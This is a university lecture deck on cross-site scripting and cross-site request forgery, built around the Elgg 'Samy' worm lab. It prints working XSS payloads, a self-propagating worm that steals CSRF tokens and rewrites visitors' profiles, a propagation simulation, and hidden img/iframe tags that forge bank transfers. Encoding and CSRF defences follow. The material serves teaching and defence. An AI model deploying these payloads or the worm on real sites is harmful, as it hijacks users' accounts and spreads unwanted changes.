![Page 1: Web Applications Vulnerabilitieshome.eng.iastate.edu/~othmanel/files/CPRE562/Lecture 3...7 Cross-Site Scripting Target website Attacker Victim Attacker injects their code into the](https://reader035.vdocuments.mx/reader035/viewer/2022071419/611869b67a55e42a612cae82/html5/thumbnails/1.jpg)
Web Applications Vulnerabilities
Lotfi ben Othmane
Disclaimer
Examples are from the book Computer Security: A Hands-on Approach by Wenliang Du.
Cross-Site Scripting in OWASP Top 10
Number 3 (A3 in the 2013 edition of the list; XSS moved to A7 in 2017 and is folded into A03 Injection in the 2021 list).
Plan
• Cross-Site Scripting Attack
• Cross-Site Request Forgery Attack
Cross-Site Scripting
[Figure: Attacker, Target website, Victim]
The attacker injects their code into the victim's browser via the targeted website. The code arrives inside a page from a site the victim is logged in to, so the browser runs it with that site's origin and the victim's session.
Cross-Site Scripting
[Figure: the browser sends a Request to the website, which processes the request and generates the Response]
XSS happens when attacker-controlled data is copied into that response without being encoded: the victim's browser cannot tell it apart from the application's own script and executes it.
Non-persistent XSS
[Figure: Attacker, Target website]
Normal request: www.example.com/search?input=word
Attack request: www.example.com/search?input=<script>alert("attack");</script>
The server echoes the input parameter back in the results page. With the attack request the echoed text is a script, which the victim's browser runs. Nothing is stored on the server, so the attacker has to get the victim to open the crafted URL, for example by sending the link; this is also called reflected XSS.
Persistent XSS
[Figure: the attacker submits the payload to the target website once; the website stores it and serves it to every visitor]
Payload: <script>alert("attack");</script>
Here the script is saved on the server (a profile field, a comment, a forum post) and delivered to everyone who later views that page, so no crafted link is needed and the attack repeats on every visit; this is also called stored XSS.
XSS Damage
1. Manipulate the DOM and make arbitrary changes to the web page
2. Send requests on the victim's behalf (they carry the victim's cookies and session)
3. Steal information such as cookies
Samy Profile
[Figure: screenshot of Samy's profile page]
Goal: Einstein Recognizes Samy as Smarter
XSS in Action
| User | Username | Password |
| --- | --- | --- |
| Admin | admin | seedelgg |
| Rainman | Rainman | Seedrainman |
| Samy | samy | seedsamy |
Capture the Add-friend Request
http://www.website.com/action/friends/add?friend=42&__elgg_ts=14555&__elgg_token=7c999…
Cookie: Elgg=nstklor…
The request that adds friend 42 carries two per-session values, __elgg_ts and __elgg_token, plus the Elgg session cookie. The browser attaches the cookie on its own; an injected script has to supply the token pair itself, which Elgg exposes to scripts on its pages as elgg.security.token.
Construct a Script

```html
<script id="worm" type="text/javascript">
var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
var sendurl = "http://www.website.com/action/friends/add?friend=42" + token + ts;
var Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.website.com"); // Host is a forbidden header name; the browser silently drops it
// Ajax.setRequestHeader(…)                         // second header elided on the slide
Ajax.send();
</script>
```

The script runs in the browser of whoever views the page it is injected into, so the request goes out with the viewer's session and friend 42 is added to the viewer's friend list. Reading the token pair from elgg.security.token is what lets the script pass Elgg's CSRF check.
Inject the Script Into the Profile
Paste the script from the previous slide into the About me field of Samy's profile. Elgg stores it and renders it, unencoded, to every visitor of the profile.
Modify Visitor's Profile

```html
<script id="worm" type="text/javascript">
var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
var name = "&name=" + elgg.session.user.name;   // not on the slide: the viewer's name and guid fields,
var guid = "&guid=" + elgg.session.user.guid;   // assumed from the variables send() uses below
var desc = "&description=SAMY IS SMARTER";
desc += "&accesslevel[description]=2";
var sendurl = "http://www.website.com/action/friends/edit";
var Ajax = new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Host", "www.website.com"); // forbidden header name, ignored by the browser
// Ajax.setRequestHeader(…)                         // elided on the slide
Ajax.send(token + ts + name + desc + guid);
</script>
```

Paste the code into the About me field. When a victim views Samy's profile, the script posts an edit of the victim's own profile that sets the description to "SAMY IS SMARTER" with access level 2 (public in Elgg).
Propagation
[Figure: the attacker's profile infects each visitor, and each infected profile infects its own visitors in turn]
Propagation – How to Change the Script?
The script on the previous slide only rewrites the visitor's description to "SAMY IS SMARTER"; the visitor's profile does not carry the script, so the infection stops there. To propagate, the script must include a copy of its own source in the description it writes.
Propagation – How to Change the Script?

```html
<script id="worm" type="text/javascript">
// …
var headerTag = "<script id=\"worm\" type=\"text/javascript\">";
var jscode = document.getElementById("worm").innerHTML;  // the worm reads its own source from the DOM
var tailTag = "</" + "script>";                           // split so the HTML parser does not close the script here
var wormCode = encodeURIComponent(headerTag + jscode + tailTag);
// …
var desc = "&description=SAMY IS SMARTER " + wormCode;
desc += "&accesslevel[description]=2";
var sendurl = "http://www.website.com/action/friends/edit";
var Ajax = new XMLHttpRequest();
// …
Ajax.send(token + ts + name + desc + guid);
</script>
```

Add the code to the description field of the target: the visitor's description now contains a URL-encoded copy of the whole worm, so the visitor's profile infects its own visitors in turn.
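The propagation on the preceding slides, as an added simulation that is not Elgg's code and not the book's: a toy server with three users handles the profile-edit action with the fields the slides send, and a toy browser renders a profile and runs every <script> in it with the viewer's session, as a real browser would. The guids, the token values, the path, the Content-Type header (used in place of the Host header on the slides, which a browser does not let a script set) and the name/guid fields taken from the viewer's session are assumptions made for this example.

```javascript
// Toy site state (constructed). Real Elgg issues a token pair per session;
// one pair for everyone keeps the example short.
const users = {
  samy:    { guid: 42, name: 'samy',    description: '' },
  rainman: { guid: 43, name: 'rainman', description: 'Hello from Rainman' },
  admin:   { guid: 44, name: 'admin',   description: 'Site admin' },
};
const TOKEN = { __elgg_ts: '14555', __elgg_token: '7c999' };

// The worm from the slides. name/guid come from the viewer's session (assumed);
// Content-Type replaces the slides' Host header (assumed).
const WORM = `<script id="worm" type="text/javascript">
var headerTag = "<script id=\\"worm\\" type=\\"text/javascript\\">";
var jscode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jscode + tailTag);
var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
var name = "&name=" + elgg.session.user.name;
var guid = "&guid=" + elgg.session.user.guid;
var desc = "&description=SAMY IS SMARTER " + wormCode;
desc += "&accesslevel[description]=2";
var sendurl = "http://www.website.com/action/friends/edit";
var Ajax = new XMLHttpRequest();
Ajax.open("POST", sendurl, true);
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send(token + ts + name + desc + guid);
</script>`;

// Toy server: the edit action checks the CSRF token, then lets the logged-in
// user change their own description. The token check passes for the worm,
// because the worm read the token from the page it runs in.
function serverHandle(sessionUser, url, body) {
  if (!url.endsWith('/action/friends/edit')) return 404;
  const p = new URLSearchParams(body);
  if (p.get('__elgg_token') !== TOKEN.__elgg_token) return 403;
  if (p.get('guid') !== String(sessionUser.guid)) return 403;
  sessionUser.description = p.get('description'); // stored unencoded, like the vulnerable site
  return 200;
}

function renderProfile(user) {
  return `<h1>${user.name}</h1>\n<div class="about">${user.description}</div>`;
}

// Toy browser: load profileName's page while logged in as viewerName and run
// each <script> with the viewer's session, DOM and an XHR that reaches the server.
function visit(viewerName, profileName) {
  const viewer = users[viewerName];
  const html = renderProfile(users[profileName]);
  const scriptRe = /<script[^>]*>([\s\S]*?)<\/script>/g;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const code = m[1];
    const elgg = { security: { token: TOKEN },
                   session: { user: { name: viewer.name, guid: viewer.guid } } };
    const document = { getElementById: (id) => (id === 'worm' ? { innerHTML: code } : null) };
    const XMLHttpRequest = function () {
      this.open = (method, url) => { this.url = url; };
      this.setRequestHeader = () => {};
      this.send = (body) => { this.status = serverHandle(viewer, this.url, body); };
    };
    new Function('elgg', 'document', 'XMLHttpRequest', code)(elgg, document, XMLHttpRequest);
  }
  return html;
}

// Samy pastes the worm into his own About me field.
function seedSamy() { users.samy.description = WORM; }

// Which profiles now carry the worm?
function infected() {
  return Object.values(users).filter((u) => u.description.includes('id="worm"')).map((u) => u.name);
}

// Scenario from the Propagation slide: Rainman views Samy, then Admin views Rainman.
function runScenario() {
  seedSamy();
  visit('rainman', 'samy');
  visit('admin', 'rainman');
  return infected();
}
```

Running runScenario() returns ['samy', 'rainman', 'admin']: each viewer's description ends up as "SAMY IS SMARTER " followed by a byte-for-byte copy of the worm, because innerHTML of the script element reproduces the source exactly and the percent-encoding round-trips through the server's form parser.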
Preventing XSS Attacks
• The browser cannot tell whether a script in the response was generated by the application or injected by an attacker, so everything that reaches it is code to execute.
• Countermeasures:
1. Input sanitization: use a sanitization library to separate data from code before it is stored or processed (a strict allow-list of what is accepted is safer than trying to blacklist tags).
2. Output encoding: the server HTML-encodes data before writing it into the page, so the browser displays it rather than executing it.
E.g., <script>alert('XSS')</script> is sent as &lt;script&gt;alert('XSS')&lt;/script&gt;. The browser converts the entities back to the text <script>alert('XSS')</script> and displays it instead of running it.
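The search page from the non-persistent XSS slide and the "About me" field from the persistent case, each rendered once without and once with output encoding, as an added example that is not from the slides or the book. The in-memory store, the URL and the function names are constructed for this example.

```javascript
// Output encoding: the five characters that can change HTML structure become
// entities, so the browser shows the text instead of parsing it as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Reflected (non-persistent): the query parameter is copied into the response.
function renderSearchVulnerable(input) {
  return `<h1>Results for: ${input}</h1>`;
}
// Same page, input encoded at the point where it is written into HTML.
function renderSearchSafe(input) {
  return `<h1>Results for: ${escapeHtml(input)}</h1>`;
}

// Stored (persistent): the text is saved once and served to every visitor.
const profiles = new Map(); // stands in for the site's database
function saveAboutMe(user, text) {
  profiles.set(user, text);
}
function renderProfileVulnerable(user) {
  return `<div class="about">${profiles.get(user) || ''}</div>`;
}
function renderProfileSafe(user) {
  return `<div class="about">${escapeHtml(profiles.get(user) || '')}</div>`;
}

// Parse the input parameter from the slide's URL, as the server would.
function inputFromUrl(url) {
  return new URL(url).searchParams.get('input');
}

// Test aid only (a blacklist like this is not a defence): is a live <script> tag left?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The slide's attack URL; the browser percent-encodes the payload on the wire.
const ATTACK_URL = 'http://www.example.com/search?input=' +
  encodeURIComponent('<script>alert("attack");</script>');
```

Encoding has to match the context the data lands in: the entity encoding above is correct for element content and quoted attribute values, while data written inside a <script> block, a URL or a CSS value needs the encoder for that context. Sanitizing on input is a second layer, not a replacement: the same stored text may be rendered in several contexts later.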
Cross-Site Request Forgery in OWASP Top 10
Number 8 (A8 in the 2013 edition; CSRF was dropped from the 2017 list because most web frameworks had added token defences by then).
Cross-Site Request Forgery (CSRF)
[Figure: a page from Website A embeds an advertisement from the Advertiser Website B]
Requests from A's page back to A are same-site requests and carry A's cookies. The embedded advertisement makes the browser send a cross-site request to B, and the browser attaches B's cookies to it. Cross-site requests are a normal part of the web; a CSRF attack abuses them by having the victim's browser send a request, with the victim's cookies, to a site where the victim is logged in.
Cross-Site Request Forgery (CSRF)
[Figure: the victim's browser loads a page from www.sourcesite.com (the attacker's site), which triggers a forged cross-site request to www.bank32.com]
The attacker's page makes the browser send a GET or POST to the target website. Because the victim is logged in to the bank, the browser attaches the bank's session cookie and the bank handles the request as the victim's:
http://www.bank32.com/transfer.php?to=me&amount=500
Cross-Site Request Forgery (CSRF)
Use other tags to hide the CSRF:

```html
<img src="http://www.bank32.com/transfer.php?to=me&amount=500">
<iframe src="http://www.bank32.com/transfer.php?to=me&amount=500"></iframe>
```

Both tags make the browser issue the GET as soon as the page loads, with no click from the victim. A POST can be forged the same way with a hidden <form> whose action is the bank's URL and which the page submits automatically with a script.
CSRF for Elgg's Add-friend

```html
<html><body><h1> This is CSRF </h1>
<img src="http://www.elgg.com/action/friends/add?friend=42" alt="image" width="1" height="1">
</body></html>
```

The 1x1 image is invisible to the victim, but the browser still sends the add-friend request with the victim's Elgg session cookie. Unlike the captured request earlier, this one carries no __elgg_ts and __elgg_token, so it succeeds only if the server does not check them.
Countermeasures for CSRF
1. Referer header: the browser sends the address of the page that caused the request, so the server can reject state-changing requests that did not come from its own pages. Browsers and privacy settings may strip the header, so a missing Referer must be handled explicitly rather than treated as trusted.
2. SameSite cookies: the site sets the SameSite attribute on its session cookie. With Strict the cookie is never sent on a cross-site request; with Lax it is sent cross-site only on a top-level navigation with a safe method such as GET (following a link), not for embedded <img> or <iframe> loads, cross-site XHR, or POST; with None it is sent as a regular cookie.
3. Secret token: the server embeds a per-session secret in every page or form it serves and checks it on each state-changing request. Because of the same-origin policy a page from another site cannot read the token, so it cannot assemble a valid request. A script injected through XSS runs on the site's own origin and can read it, which is how the worm above obtained __elgg_ts and __elgg_token: the token stops CSRF, not XSS.
Thank you
Any questions?